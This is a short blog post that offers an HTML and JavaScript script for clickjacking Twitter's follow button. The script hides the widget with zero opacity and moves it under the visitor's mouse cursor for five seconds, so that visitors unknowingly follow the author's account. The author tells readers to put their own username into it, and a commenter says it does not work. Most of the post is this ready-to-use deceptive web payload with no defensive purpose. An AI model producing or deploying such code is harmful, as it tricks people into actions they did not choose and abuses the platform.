Twitter Clickjacking
![[SCRIPT] Twitter Clickjacking](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJjRNMQvtrUd_OL4CvQsG72RnR0fugoZlq7ZdgXPl7TpjZ31w05E8c_0bmrmuSIHgnPm9-PkasK88nQ2Q05WB0P2S2S1IGBNOUdtml2aDaBL4cwaeC47uiOY857yArUHfP1No4QGzn4eF5/s1600/twitter-logo.png)
This is my basic script for make a twitter/follow clickjacking,
Code:
<!DOCTYPE html>
<html>
<head>
</head>
<style>.twitter-follow-button{opacity:0;}</style>
<body>
<a href="https://twitter.com/google" class="twitter-follow-button" data-show-count="false"></a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
<script>
var oe = document.onmousemove;
var delay = 5000;
document.onmousemove = function(e)
{
var d = document.getElementsByClassName('twitter-follow-button')[0];
d.style.position = "absolute";
d.style.left = e.pageX-50+'px';
d.style.top = e.pageY-10+'px';
};
setTimeout(function()
{
var d = document.getElementsByClassName('twitter-follow-button')[0];
d.parentNode.removeChild(d);
document.onmousemove = oe;
},delay);
</script>
</body>
</html>
change https://twitter.com/google with your account https://twitter.com/yourusername .
your script is not working
ReplyDelete